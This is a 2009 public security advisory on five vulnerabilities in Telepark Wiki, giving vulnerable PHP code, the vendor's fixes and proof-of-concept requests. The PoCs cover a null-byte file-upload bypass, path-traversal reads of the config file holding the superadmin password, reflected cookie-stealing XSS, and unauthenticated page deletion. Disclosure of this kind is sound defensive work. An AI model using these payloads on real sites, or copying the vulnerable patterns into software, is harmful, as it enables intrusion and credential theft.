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Posted on 17 November 2009

Abysssec Inc Public Advisory Title : Telepark Wiki Multiple Remote Vulnerabilities Affected Version : <= v2.4.23 Vendor Site : www.teamtodo.com Discovery : www.Abysssec.com Vendor contact : 8 november Vendor response : 9 november (patch is available in vendor website) Description : now vendor patched all vulnerabities and you can see "FIXED" section in after vulnerable codes. so there is no point to keep these vulnerabites private anymore. and final note these vulnerabities are just for educational purpose and author will be not be responsible for any damage using this vulnerabiltes . a real big thanks to muts [at] offsec .com Vulnerabilites : ================================================================================= 1- upload shell / remote command execute vulnerability in /ajax/addComment.php there are intersting vulnerability in commeting system even guest can comment in this wiki. Vulnerability : line 65-68 $body.=stripslashes($_POST['wikiComment'])." "; if( isset($_FILES['wikiFile']) && !empty($_FILES['wikiFile']['tmp_name'])) { $body.=str_replace("<FILE>",$_POST['wikiFileName'],str_file_uploaded).". "; } for bypass you can use : image.jpg%00.php note : use group variable for changing directory to another writeable directory FIXED: line 22: if (isset($_POST['wikiComment']) && isset($_POST['pageID']) && $wiki->isUserPage($_POST['pageID'],"loggedUser",true,P_COMMENT)) { added check is user allowed to comment line 29: $data=$wiki->savePage($data,"comment"); savePage now returns checked data - if file name is not allowed returns empty string instead of name line 67: $body.=str_replace("<FILE>",$data['wikiFileName'],str_file_uploaded).". "; uses checked filename returned from savePage function ==================================================================================== 2- local file include and admin password disclosure in getjs.php , getcsslocal.php , upload.php (patched in latest) Vulnerability : getcsslocal.php line 3-14 $css=$_GET['css']; $filepath=str_replace(basename($_SERVER['PHP_SELF']),"",__FILE__); $fp=@fopen($filepath.$css,"r"); $file=""; if ($fp) { while (!feof($fp)) { $file.=fgets($fp,4096); } fclose($fp); } PoC : http://vulnerable.com/getcsslocal.php?css=/includes/config.inc.php note: config file is cleare text and contains superadmin password ! FIXED : line 4-5 $filepath=str_replace(basename($_SERVER['PHP_SELF']),"",__FILE__); $fileinfo=pathinfo($filepath.$css); ================================================================================= getjs.php line 3-14 $js=$_GET['js']; $filepath=str_replace(basename($_SERVER['PHP_SELF']),"",__FILE__); $fp=@fopen($filepath.$js,"r"); $file=""; if ($fp) { while (!feof($fp)) { $file.=fgets($fp,4096); } fclose($fp); } FIXED : line 4-5 $fileinfo=pathinfo($filepath.$js); if ($fileinfo['extension']!="js") die(); PoC : http://vulnerable.com/getjs.php?css=/includes/config.inc.php note: config file is cleare text and contains superadmin password ! ================================================================================= upload.php line 47-62 if ($group!="") $group.="/"; if ($show) { $go=true; if (IS_MOBILE) { $wiki=new WIki(); $mobile=new WikiMobile($wiki); $go=!$mobile->resizeImage("UserFiles/upload/".$group.$filename); } if ($go) { header('Content-Type: "'.mime_get_type($filename).'"'); readfile("UserFiles/upload/".$group.$filename); } } else { header("HTTP/1.0 401 Authorization Required"); } ?> FIXED : line 54-65 $file=realpath("UserFiles/upload/".$group.$filename); if ($file===false) { header("HTTP/1.0 404 Not Found"); exit(); } $test=str_replace(str_replace(basename(__FILE__),"",__FILE__),"",$file); if (substr($test,0,strlen("UserFiles/upload/"))!="UserFiles/upload/") { header("HTTP/1.0 401 Authorization Required"); exit(); } PoC : http://vulnerable.com/upload.php?group=/includes/config.inc.php note: config file is cleare text and contains superadmin password ! ==================================================================================== 3- Cross Site Scripting in index.php Vulnerability : there is a simple cross site scripting in index . PoC : http://www.vulnerable.com/index.php/"><script>alert(document.cookie)</script> FIXED: new function untaintURL in app_header.inc.php in config.inc.php changed definition of ROOT_URL: lines 168-169: $folder=str_replace("index.php","",$folder); define("ROOT_URL",untaintUrl(str_replace("/ajax","",(($_SERVER['SERVER_PORT']==443)?"https://":"http://") . $_SERVER['HTTP_HOST'] . $folder))); ==================================================================================== 4- Delete Page Vulnerability in /ajax/deletePage.php Vulnerability: there is vulnerability can delete pages without any authentication ! line 20-24 if (isset($_POST['pageID'])) { $pageID = $_POST['pageID']; $wiki = new Wiki(); $wiki->deletePage($pageID); } PoC : http://www.vulnerable.com/ajax/deletePage.php POST = PageId = [Page] FIXED: line 20: if (isset($_POST['pageID']) && $wiki->isUserPage($_POST['pageID'],"loggedUser",true,P_DELETE)) { added check for user permissions ==================================================================================== 5- Delete Comment Vulnerability /ajax/deleteComment.php line 21-40 if (isset($_POST['pageID'])) $pageID = $_POST['pageID']; //getting variable else $pageID = '-1'; $wiki = new Wiki(); $time=$_POST['comment']; $data= $wiki->loadPage($pageID); $comments = $data['wikiComment']; for ($i=0; $i<count($comments); $i++) { $tmp=explode("|",$comments[$i]); if (trim($tmp[0])==trim($time)) { unset($data['wikiComment'][$i]); break; } } $data['wikiComment']=array_merge($data['wikiComment']); $data['pageID']=$pageID; $data=$wiki->addSpamFields($data); $wiki->updatePage($data); // update PoC : http://www.vulnerable.com/ajax/deleteComment.php POST = PageId = [Page] FIXED: line 25: if ($wiki->user($wiki->loggedUserId())!="Superadmin") die("Access denied"); added check for superadmin before processing ==================================================================================== feel free to contact me : admin [at] abysssec.com